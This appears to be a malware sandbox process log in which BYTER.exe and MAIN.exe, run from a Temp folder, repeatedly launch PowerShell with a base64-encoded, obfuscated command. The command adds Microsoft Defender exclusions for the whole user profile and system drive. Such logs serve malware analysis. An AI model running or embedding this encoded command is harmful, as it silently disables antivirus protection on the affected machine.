"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6688185441245147572-776670553-20337787802058778457-2047499821-1255277638-1129605797"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
